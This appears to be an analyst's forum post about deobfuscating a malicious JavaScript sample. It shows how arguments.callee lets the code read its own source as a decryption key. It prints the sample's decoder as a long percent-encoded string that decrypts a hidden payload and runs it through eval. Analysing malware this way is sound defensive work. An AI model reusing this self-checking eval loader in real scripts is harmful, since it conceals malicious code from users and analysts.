After reading through the code and some reference regarding arguments.callee, I've figured out how to deobfuscate the arguments.callee tricks.
Basically if arguments.callee is assigned to a variable (for example: myarg), myarg will have the copy of the function's content.
For example;
function lala() {
var myarg = arguments.callee.toString();
document.write(myarg);
}
lala();
will print the result:
function lala() {
var myarg = arguments.callee.toString();
document.write(myarg);
}
which is starting from "function" until the last "}"
So, in the case of the sample above, by changing the value QLC_uI_xq to:
QLC_uI_xq = unescape("%66%75%6e%63%74%69%6f%6e%20%4e%5f%75%32%5f%47%31%57%45%4e%41%38%34%4c%28%54%35%76%32%45%62%45%46%2c%20%6e%34%4c%4d%68%5f%71%34%4d%74%5f%4f%31%68%44%29%7b%76%61%72%20%51%4c%43%5f%75%49%5f%78%71%20%3d%20%4e%5f%75%32%5f%47%31%57%45%4e%41%38%34%4c%5b%27%61%27%2b%27%72%67%75%6d%27%2b%27%65%6e%74%73%27%5d%5b%22%63%22%20%2b%20%22%61%7a%7a%65%65%22%5b%27%72%27%2b%27%65%70%6c%27%2b%27%61%63%65%27%5d%28%2f%7a%7a%2f%2c%20%27%6c%6c%27%29%5d%3b%51%4c%43%5f%75%49%5f%78%71%20%3d%20%51%4c%43%5f%75%49%5f%78%71%5b%22%74%22%2b%22%6f%53%22%2b%22%74%22%2b%22%72%22%2b%22%69%6e%67%22%5d%28%29%3b%76%61%72%20%63%35%35%4a%4a%62%5f%31%20%3d%20%30%3b%74%72%79%20%7b%69%66%20%28%61%70%70%29%20%7b%63%35%35%4a%4a%62%5f%31%2b%2b%3b%63%35%35%4a%4a%62%5f%31%2b%2b%3b%7d%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%76%61%72%20%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%69%66%20%28%54%35%76%32%45%62%45%46%29%20%7b%20%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%20%3d%20%54%35%76%32%45%62%45%46%3b%7d%20%65%6c%73%65%20%7b%76%61%72%20%4c%6f%5f%5f%36%5f%30%79%32%52%33%20%3d%20%30%3b%76%61%72%20%66%71%30%36%71%4d%30%37%5f%5f%51%65%5f%6a%66%20%3d%20%30%3b%76%61%72%20%4b%68%33%5f%32%42%47%5f%48%6d%71%30%72%20%3d%20%35%31%32%3b%76%61%72%20%54%35%78%5f%77%50%5f%33%64%20%3d%20%35%32%3b%54%35%78%5f%77%50%5f%33%64%20%3d%20%54%35%78%5f%77%50%5f%33%64%20%2d%20%34%3b%76%61%72%20%4c%32%5f%5f%5f%4f%31%48%62%47%20%3d%20%54%35%78%5f%77%50%5f%33%64%20%2b%20%39%3b%77%68%69%6c%65%28%66%71%30%36%71%4d%30%37%5f%5f%51%65%5f%6a%66%20%3c%20%51%4c%43%5f%75%49%5f%78%71%2e%6c%65%6e%67%74%68%29%20%7b%76%61%72%20%67%77%38%53%5f%72%5f%61%48%4f%20%3d%20%31%3b%76%61%72%20%56%5f%4e%38%4d%56%34%5f%76%6f%38%75%20%3d%20%51%4c%43%5f%75%49%5f%78%71%5b%27%63%27%2b%27%68%27%2b%27%61%72%43%27%2b%27%6f%64%65%41%74%27%5d%28%66%71%30%36%71%4d%30%37%5f%5f%51%65%5f%6a%66%29%3b%69%66%20%28%56%5f%4e%38%4d%56%34%5f%76%6f%38%75%20%3c%3d%20%4c%32%5f%5f%5f%4f%31%48%62%47%20%26%26%20%56%5f%4e%38%4d%56%34%5f%76%6f%38%75%20%3e%3d%20%54%35%78%5f%77%50%5f%33%64%29%20%7b%69%66%20%28%4c%6f%5f%5f%36%5f%30%79%32%52%33%20%3d%3d%20%34%29%20%7b%20%4c%6f%5f%5f%36%5f%30%79%32%52%33%20%3d%20%30%3b%20%7d%69%66%20%28%69%73%4e%61%4e%28%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%5b%4c%6f%5f%5f%36%5f%30%79%32%52%33%5d%29%29%20%7b%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%5b%4c%6f%5f%5f%36%5f%30%79%32%52%33%5d%20%3d%20%30%3b%7d%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%5b%4c%6f%5f%5f%36%5f%30%79%32%52%33%5d%20%2b%3d%20%56%5f%4e%38%4d%56%34%5f%76%6f%38%75%3b%69%66%20%28%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%5b%4c%6f%5f%5f%36%5f%30%79%32%52%33%5d%20%3e%20%35%31%32%29%20%7b%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%5b%4c%6f%5f%5f%36%5f%30%79%32%52%33%5d%20%2d%3d%20%4b%68%33%5f%32%42%47%5f%48%6d%71%30%72%3b%7d%4c%6f%5f%5f%36%5f%30%79%32%52%33%2b%2b%3b%7d%66%71%30%36%71%4d%30%37%5f%5f%51%65%5f%6a%66%2b%2b%3b%7d%7d%4c%6f%5f%5f%36%5f%30%79%32%52%33%20%3d%20%34%3b%66%6f%72%20%28%76%61%72%20%4b%5f%5f%51%45%5f%37%34%37%20%3d%20%30%3b%20%4b%5f%5f%51%45%5f%37%34%37%20%3c%20%34%3b%20%4b%5f%5f%51%45%5f%37%34%37%2b%2b%29%20%7b%69%66%20%28%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%5b%4b%5f%5f%51%45%5f%37%34%37%5d%20%3e%20%32%35%36%29%20%7b%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%5b%4b%5f%5f%51%45%5f%37%34%37%5d%20%2d%3d%20%32%35%36%3b%7d%7d%76%61%72%20%41%5f%68%35%6d%5f%4e%58%51%20%3d%20%30%3b%76%61%72%20%50%5f%32%5f%4e%79%5f%64%20%3d%20%22%22%3b%76%61%72%20%56%66%78%46%37%70%5f%33%5f%5f%5f%38%64%77%20%3d%20%30%3b%76%61%72%20%66%73%79%5f%57%35%4e%5f%5f%5f%5f%64%20%3d%20%30%3b%76%61%72%20%65%72%44%48%36%57%78%3b%76%61%72%20%75%70%36%57%5f%59%4b%4e%20%3d%20%30%3b%77%68%69%6c%65%28%56%66%78%46%37%70%5f%33%5f%5f%5f%38%64%77%20%3c%20%6e%34%4c%4d%68%5f%71%34%4d%74%5f%4f%31%68%44%2e%6c%65%6e%67%74%68%29%20%7b%76%61%72%20%73%44%62%37%5f%76%34%31%61%20%3d%20%6e%34%4c%4d%68%5f%71%34%4d%74%5f%4f%31%68%44%2e%73%75%62%73%74%72%28%56%66%78%46%37%70%5f%33%5f%5f%5f%38%64%77%2c%20%31%29%20%2b%20%22%5a%22%3b%76%61%72%20%52%33%46%45%5f%4a%5f%54%52%5f%65%20%3d%20%70%61%72%73%65%49%6e%74%28%73%44%62%37%5f%76%34%31%61%2c%20%31%36%29%3b%69%66%20%28%66%73%79%5f%57%35%4e%5f%5f%5f%5f%64%29%20%7b%65%72%44%48%36%57%78%20%2b%3d%20%52%33%46%45%5f%4a%5f%54%52%5f%65%3b%69%66%20%28%41%5f%68%35%6d%5f%4e%58%51%20%3d%3d%20%34%29%20%7b%41%5f%68%35%6d%5f%4e%58%51%20%2d%3d%20%34%3b%7d%76%61%72%20%48%79%74%37%5f%32%63%6b%61%77%37%20%3d%20%65%72%44%48%36%57%78%3b%48%79%74%37%5f%32%63%6b%61%77%37%20%3d%20%48%79%74%37%5f%32%63%6b%61%77%37%20%2d%20%28%75%70%36%57%5f%59%4b%4e%20%2b%20%32%29%20%2a%20%57%43%31%33%44%5f%49%5f%4b%72%4e%50%54%5b%41%5f%68%35%6d%5f%4e%58%51%5d%3b%69%66%20%28%48%79%74%37%5f%32%63%6b%61%77%37%20%3c%20%30%29%20%7b%48%79%74%37%5f%32%63%6b%61%77%37%20%3d%20%48%79%74%37%5f%32%63%6b%61%77%37%20%2d%20%4d%61%74%68%2e%66%6c%6f%6f%72%28%48%79%74%37%5f%32%63%6b%61%77%37%20%2f%20%32%35%36%29%20%2a%20%32%35%36%3b%7d%48%79%74%37%5f%32%63%6b%61%77%37%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%48%79%74%37%5f%32%63%6b%61%77%37%29%3b%69%66%20%28%63%35%35%4a%4a%62%5f%31%20%3d%3d%20%32%29%20%7b%50%5f%32%5f%4e%79%5f%64%20%2b%3d%20%48%79%74%37%5f%32%63%6b%61%77%37%3b%7d%20%65%6c%73%65%20%69%66%20%28%63%35%35%4a%4a%62%5f%31%20%3d%3d%20%31%29%20%7b%50%5f%32%5f%4e%79%5f%64%20%2b%3d%20%52%33%46%45%5f%4a%5f%54%52%5f%65%3b%7d%20%65%6c%73%65%20%7b%50%5f%32%5f%4e%79%5f%64%20%2b%3d%20%56%66%78%46%37%70%5f%33%5f%5f%5f%38%64%77%3b%7d%41%5f%68%35%6d%5f%4e%58%51%2b%2b%3b%66%73%79%5f%57%35%4e%5f%5f%5f%5f%64%20%3d%20%30%3b%75%70%36%57%5f%59%4b%4e%2b%2b%3b%7d%20%65%6c%73%65%20%7b%66%73%79%5f%57%35%4e%5f%5f%5f%5f%64%20%3d%20%31%3b%65%72%44%48%36%57%78%20%3d%20%52%33%46%45%5f%4a%5f%54%52%5f%65%20%2a%20%31%36%3b%7d%56%66%78%46%37%70%5f%33%5f%5f%5f%38%64%77%2b%2b%3b%7d%3b%76%61%72%20%61%62%63%64%3d%30%3b%20%3b%76%61%72%20%58%65%5f%32%51%78%74%46%34%20%3d%20%74%68%69%73%3b%58%65%5f%32%51%78%74%46%34%5b%27%65%76%27%2b%27%61%6c%27%5d%28%50%5f%32%5f%4e%79%5f%64%29%3b%7d%0d%0a");
you might be able to deobfuscate and get the final result for analysis.
The reason why I failed before is that, I got the wrong notion about arguments.callee . I thought that arguments.callee copy ALL the content inside the eval.001.log, but instead, it just copy the function's content.. LOL